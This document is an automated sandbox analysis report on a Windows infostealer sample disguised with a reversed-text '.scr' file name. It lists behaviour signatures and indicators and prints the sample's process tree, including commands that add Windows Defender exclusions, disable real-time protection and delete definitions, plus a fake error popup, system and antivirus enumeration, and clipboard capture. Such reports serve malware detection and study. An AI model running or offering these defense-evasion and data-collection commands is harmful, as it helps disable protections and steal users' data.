96c9dcad6e8cde33dd3526a4177f17d2e87f623d476756d7596ad3928065b03e

Analysis

max time kernel
31s
max time network
34s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
19-01-2025 04:37

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Built‮gnp.scr
Size

7.5MB
MD5

5c9c73cbce0ca4d2a3435b793e00c6db
SHA1

85304fe63ea3e8001ad7b334d484b425429166c3
SHA256

96c9dcad6e8cde33dd3526a4177f17d2e87f623d476756d7596ad3928065b03e
SHA512

df44b85b8631e0b612707fb269f82687cb30a182eade01e7513e1eb3d89894c25455281d680c119a2c2dff133f8f422531c601681c6a78a416b73377e97dcc19
SSDEEP

196608:U4QCwVmyeurErvI9pWjgN3ZdahF0pbH1AYtWtQsNo/03Wp:sVmyeurEUWjqeWxi6rbp

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2044	powershell.exe
3344	powershell.exe
3436	powershell.exe
240	powershell.exe
4568	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built‮gnp.scr
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3516	cmd.exe
4588	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1428	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr
3784	Built‮gnp.scr

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
16	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	bootim.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
3264	tasklist.exe
4540	tasklist.exe
4300	tasklist.exe
1592	tasklist.exe
2396	tasklist.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ab0a-21.dat	upx
behavioral1/memory/3784-25-0x00007FFDA41E0000-0x00007FFDA48A4000-memory.dmp	upx
behavioral1/files/0x001900000002aaf7-27.dat	upx
behavioral1/memory/3784-29-0x00007FFDAD220000-0x00007FFDAD245000-memory.dmp	upx
behavioral1/files/0x001c00000002ab08-30.dat	upx
behavioral1/memory/3784-32-0x00007FFDAD470000-0x00007FFDAD47F000-memory.dmp	upx
behavioral1/files/0x001900000002aafd-45.dat	upx
behavioral1/files/0x001c00000002aafc-44.dat	upx
behavioral1/files/0x001900000002aafb-43.dat	upx
behavioral1/files/0x001900000002aaf8-42.dat	upx
behavioral1/files/0x001d00000002aaf6-41.dat	upx
behavioral1/files/0x001900000002ab13-40.dat	upx
behavioral1/files/0x001900000002ab10-39.dat	upx
behavioral1/files/0x001900000002ab0f-38.dat	upx
behavioral1/files/0x001900000002ab09-35.dat	upx
behavioral1/files/0x001900000002ab07-34.dat	upx
behavioral1/files/0x001900000002aafe-46.dat	upx
behavioral1/files/0x001900000002ab01-47.dat	upx
behavioral1/files/0x001c00000002ab02-48.dat	upx
behavioral1/memory/3784-54-0x00007FFDA8A30000-0x00007FFDA8A5D000-memory.dmp	upx
behavioral1/memory/3784-56-0x00007FFDA9830000-0x00007FFDA984A000-memory.dmp	upx
behavioral1/memory/3784-58-0x00007FFDA8A00000-0x00007FFDA8A24000-memory.dmp	upx
behavioral1/memory/3784-60-0x00007FFDA4060000-0x00007FFDA41DF000-memory.dmp	upx
behavioral1/memory/3784-66-0x00007FFDA74D0000-0x00007FFDA7503000-memory.dmp	upx
behavioral1/memory/3784-71-0x00007FFDA7400000-0x00007FFDA74CD000-memory.dmp	upx
behavioral1/memory/3784-74-0x00007FFDAD220000-0x00007FFDAD245000-memory.dmp	upx
behavioral1/memory/3784-73-0x00007FFD9D400000-0x00007FFD9D929000-memory.dmp	upx
behavioral1/memory/3784-79-0x00007FFDA7820000-0x00007FFDA782D000-memory.dmp	upx
behavioral1/memory/3784-78-0x00007FFDA8A30000-0x00007FFDA8A5D000-memory.dmp	upx
behavioral1/memory/3784-76-0x00007FFDA89D0000-0x00007FFDA89E4000-memory.dmp	upx
behavioral1/memory/3784-70-0x00007FFDA41E0000-0x00007FFDA48A4000-memory.dmp	upx
behavioral1/memory/3784-64-0x00007FFDA89F0000-0x00007FFDA89FD000-memory.dmp	upx
behavioral1/memory/3784-63-0x00007FFDA9410000-0x00007FFDA9429000-memory.dmp	upx
behavioral1/memory/3784-81-0x00007FFDA3F40000-0x00007FFDA405B000-memory.dmp	upx
behavioral1/memory/3784-102-0x00007FFDA8A00000-0x00007FFDA8A24000-memory.dmp	upx
behavioral1/memory/3784-118-0x00007FFDA4060000-0x00007FFDA41DF000-memory.dmp	upx
behavioral1/memory/3784-309-0x00007FFDA74D0000-0x00007FFDA7503000-memory.dmp	upx
behavioral1/memory/3784-317-0x00007FFDA7400000-0x00007FFDA74CD000-memory.dmp	upx
behavioral1/memory/3784-328-0x00007FFD9D400000-0x00007FFD9D929000-memory.dmp	upx
behavioral1/memory/3784-347-0x00007FFDA41E0000-0x00007FFDA48A4000-memory.dmp	upx
behavioral1/memory/3784-353-0x00007FFDA4060000-0x00007FFDA41DF000-memory.dmp	upx
behavioral1/memory/3784-348-0x00007FFDAD220000-0x00007FFDAD245000-memory.dmp	upx
behavioral1/memory/3784-403-0x00007FFDA89D0000-0x00007FFDA89E4000-memory.dmp	upx
behavioral1/memory/3784-405-0x00007FFDA3F40000-0x00007FFDA405B000-memory.dmp	upx
behavioral1/memory/3784-411-0x00007FFDA8A00000-0x00007FFDA8A24000-memory.dmp	upx
behavioral1/memory/3784-410-0x00007FFDA9830000-0x00007FFDA984A000-memory.dmp	upx
behavioral1/memory/3784-409-0x00007FFDA8A30000-0x00007FFDA8A5D000-memory.dmp	upx
behavioral1/memory/3784-408-0x00007FFDAD470000-0x00007FFDAD47F000-memory.dmp	upx
behavioral1/memory/3784-407-0x00007FFDAD220000-0x00007FFDAD245000-memory.dmp	upx
behavioral1/memory/3784-406-0x00007FFD9D400000-0x00007FFD9D929000-memory.dmp	upx
behavioral1/memory/3784-404-0x00007FFDA7820000-0x00007FFDA782D000-memory.dmp	upx
behavioral1/memory/3784-401-0x00007FFDA7400000-0x00007FFDA74CD000-memory.dmp	upx
behavioral1/memory/3784-400-0x00007FFDA74D0000-0x00007FFDA7503000-memory.dmp	upx
behavioral1/memory/3784-399-0x00007FFDA89F0000-0x00007FFDA89FD000-memory.dmp	upx
behavioral1/memory/3784-398-0x00007FFDA9410000-0x00007FFDA9429000-memory.dmp	upx
behavioral1/memory/3784-391-0x00007FFDA41E0000-0x00007FFDA48A4000-memory.dmp	upx
behavioral1/memory/3784-397-0x00007FFDA4060000-0x00007FFDA41DF000-memory.dmp	upx

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	bootim.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	bootim.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	bootim.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	bootim.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4516	cmd.exe
3888	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4364	WMIC.exe
2272	WMIC.exe
2828	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2132	systeminfo.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "14"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe

Modifies registry class 4 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
2044	powershell.exe
240	powershell.exe
2044	powershell.exe
240	powershell.exe
3344	powershell.exe
3344	powershell.exe
3160	powershell.exe
3160	powershell.exe
4588	powershell.exe
4588	powershell.exe
3160	powershell.exe
4588	powershell.exe
4568	powershell.exe
4568	powershell.exe
4840	powershell.exe
4840	powershell.exe
3436	powershell.exe
3436	powershell.exe
4796	powershell.exe
4796	powershell.exe
1100	msedge.exe
1100	msedge.exe
4664	msedge.exe
4664	msedge.exe
2444	msedge.exe
2444	msedge.exe
2804	identity_helper.exe
2804	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3264	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4316	WMIC.exe
Token: SeSecurityPrivilege	4316	WMIC.exe
Token: SeTakeOwnershipPrivilege	4316	WMIC.exe
Token: SeLoadDriverPrivilege	4316	WMIC.exe
Token: SeSystemProfilePrivilege	4316	WMIC.exe
Token: SeSystemtimePrivilege	4316	WMIC.exe
Token: SeProfSingleProcessPrivilege	4316	WMIC.exe
Token: SeIncBasePriorityPrivilege	4316	WMIC.exe
Token: SeCreatePagefilePrivilege	4316	WMIC.exe
Token: SeBackupPrivilege	4316	WMIC.exe
Token: SeRestorePrivilege	4316	WMIC.exe
Token: SeShutdownPrivilege	4316	WMIC.exe
Token: SeDebugPrivilege	4316	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4316	WMIC.exe
Token: SeRemoteShutdownPrivilege	4316	WMIC.exe
Token: SeUndockPrivilege	4316	WMIC.exe
Token: SeManageVolumePrivilege	4316	WMIC.exe
Token: 33	4316	WMIC.exe
Token: 34	4316	WMIC.exe
Token: 35	4316	WMIC.exe
Token: 36	4316	WMIC.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	240	powershell.exe
Token: SeIncreaseQuotaPrivilege	4316	WMIC.exe
Token: SeSecurityPrivilege	4316	WMIC.exe
Token: SeTakeOwnershipPrivilege	4316	WMIC.exe
Token: SeLoadDriverPrivilege	4316	WMIC.exe
Token: SeSystemProfilePrivilege	4316	WMIC.exe
Token: SeSystemtimePrivilege	4316	WMIC.exe
Token: SeProfSingleProcessPrivilege	4316	WMIC.exe
Token: SeIncBasePriorityPrivilege	4316	WMIC.exe
Token: SeCreatePagefilePrivilege	4316	WMIC.exe
Token: SeBackupPrivilege	4316	WMIC.exe
Token: SeRestorePrivilege	4316	WMIC.exe
Token: SeShutdownPrivilege	4316	WMIC.exe
Token: SeDebugPrivilege	4316	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4316	WMIC.exe
Token: SeRemoteShutdownPrivilege	4316	WMIC.exe
Token: SeUndockPrivilege	4316	WMIC.exe
Token: SeManageVolumePrivilege	4316	WMIC.exe
Token: 33	4316	WMIC.exe
Token: 34	4316	WMIC.exe
Token: 35	4316	WMIC.exe
Token: 36	4316	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4364	WMIC.exe
Token: SeSecurityPrivilege	4364	WMIC.exe
Token: SeTakeOwnershipPrivilege	4364	WMIC.exe
Token: SeLoadDriverPrivilege	4364	WMIC.exe
Token: SeSystemProfilePrivilege	4364	WMIC.exe
Token: SeSystemtimePrivilege	4364	WMIC.exe
Token: SeProfSingleProcessPrivilege	4364	WMIC.exe
Token: SeIncBasePriorityPrivilege	4364	WMIC.exe
Token: SeCreatePagefilePrivilege	4364	WMIC.exe
Token: SeBackupPrivilege	4364	WMIC.exe
Token: SeRestorePrivilege	4364	WMIC.exe
Token: SeShutdownPrivilege	4364	WMIC.exe
Token: SeDebugPrivilege	4364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4364	WMIC.exe
Token: SeRemoteShutdownPrivilege	4364	WMIC.exe
Token: SeUndockPrivilege	4364	WMIC.exe
Token: SeManageVolumePrivilege	4364	WMIC.exe
Token: 33	4364	WMIC.exe
Token: 34	4364	WMIC.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe
1100	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2752	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2068 wrote to memory of 3784	2068	Built‮gnp.scr	77
PID 2068 wrote to memory of 3784	2068	Built‮gnp.scr	77
PID 3784 wrote to memory of 1260	3784	Built‮gnp.scr	78
PID 3784 wrote to memory of 1260	3784	Built‮gnp.scr	78
PID 3784 wrote to memory of 432	3784	Built‮gnp.scr	79
PID 3784 wrote to memory of 432	3784	Built‮gnp.scr	79
PID 3784 wrote to memory of 4460	3784	Built‮gnp.scr	80
PID 3784 wrote to memory of 4460	3784	Built‮gnp.scr	80
PID 3784 wrote to memory of 3008	3784	Built‮gnp.scr	84
PID 3784 wrote to memory of 3008	3784	Built‮gnp.scr	84
PID 3784 wrote to memory of 2740	3784	Built‮gnp.scr	86
PID 3784 wrote to memory of 2740	3784	Built‮gnp.scr	86
PID 3008 wrote to memory of 3264	3008	cmd.exe	88
PID 3008 wrote to memory of 3264	3008	cmd.exe	88
PID 432 wrote to memory of 240	432	cmd.exe	89
PID 432 wrote to memory of 240	432	cmd.exe	89
PID 1260 wrote to memory of 2044	1260	cmd.exe	91
PID 1260 wrote to memory of 2044	1260	cmd.exe	91
PID 4460 wrote to memory of 4612	4460	cmd.exe	90
PID 4460 wrote to memory of 4612	4460	cmd.exe	90
PID 2740 wrote to memory of 4316	2740	cmd.exe	92
PID 2740 wrote to memory of 4316	2740	cmd.exe	92
PID 3784 wrote to memory of 1592	3784	Built‮gnp.scr	132
PID 3784 wrote to memory of 1592	3784	Built‮gnp.scr	132
PID 1592 wrote to memory of 4676	1592	cmd.exe	96
PID 1592 wrote to memory of 4676	1592	cmd.exe	96
PID 3784 wrote to memory of 3888	3784	Built‮gnp.scr	138
PID 3784 wrote to memory of 3888	3784	Built‮gnp.scr	138
PID 3888 wrote to memory of 776	3888	cmd.exe	99
PID 3888 wrote to memory of 776	3888	cmd.exe	99
PID 3784 wrote to memory of 2952	3784	Built‮gnp.scr	100
PID 3784 wrote to memory of 2952	3784	Built‮gnp.scr	100
PID 2952 wrote to memory of 4364	2952	cmd.exe	102
PID 2952 wrote to memory of 4364	2952	cmd.exe	102
PID 3784 wrote to memory of 4624	3784	Built‮gnp.scr	103
PID 3784 wrote to memory of 4624	3784	Built‮gnp.scr	103
PID 4624 wrote to memory of 2272	4624	cmd.exe	141
PID 4624 wrote to memory of 2272	4624	cmd.exe	141
PID 3784 wrote to memory of 3924	3784	Built‮gnp.scr	106
PID 3784 wrote to memory of 3924	3784	Built‮gnp.scr	106
PID 3924 wrote to memory of 3344	3924	cmd.exe	108
PID 3924 wrote to memory of 3344	3924	cmd.exe	108
PID 3784 wrote to memory of 384	3784	Built‮gnp.scr	109
PID 3784 wrote to memory of 384	3784	Built‮gnp.scr	109
PID 3784 wrote to memory of 2000	3784	Built‮gnp.scr	110
PID 3784 wrote to memory of 2000	3784	Built‮gnp.scr	110
PID 384 wrote to memory of 4540	384	cmd.exe	113
PID 384 wrote to memory of 4540	384	cmd.exe	113
PID 2000 wrote to memory of 4300	2000	cmd.exe	114
PID 2000 wrote to memory of 4300	2000	cmd.exe	114
PID 3784 wrote to memory of 4932	3784	Built‮gnp.scr	115
PID 3784 wrote to memory of 4932	3784	Built‮gnp.scr	115
PID 3784 wrote to memory of 3516	3784	Built‮gnp.scr	117
PID 3784 wrote to memory of 3516	3784	Built‮gnp.scr	117
PID 3784 wrote to memory of 4164	3784	Built‮gnp.scr	118
PID 3784 wrote to memory of 4164	3784	Built‮gnp.scr	118
PID 3784 wrote to memory of 4900	3784	Built‮gnp.scr	119
PID 3784 wrote to memory of 4900	3784	Built‮gnp.scr	119
PID 3784 wrote to memory of 4516	3784	Built‮gnp.scr	121
PID 3784 wrote to memory of 4516	3784	Built‮gnp.scr	121
PID 3784 wrote to memory of 4260	3784	Built‮gnp.scr	123
PID 3784 wrote to memory of 4260	3784	Built‮gnp.scr	123
PID 3784 wrote to memory of 2624	3784	Built‮gnp.scr	125
PID 3784 wrote to memory of 2624	3784	Built‮gnp.scr	125

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2808	attrib.exe
1432	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built‮gnp.scr
"C:\Users\Admin\AppData\Local\Temp\Built‮gnp.scr" /S
1⤵
- Suspicious use of WriteProcessMemory
PID:2068
- C:\Users\Admin\AppData\Local\Temp\Built‮gnp.scr
  "C:\Users\Admin\AppData\Local\Temp\Built‮gnp.scr" /S
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built‮gnp.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1260
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built‮gnp.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please ensure the latest Python version is installed.', 0, 'Error!', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4460
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please ensure the latest Python version is installed.', 0, 'Error!', 0+16);close()"
      4⤵
      PID:4612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3008
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1592
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3888
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2952
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4624
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:384
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2000
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4932
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
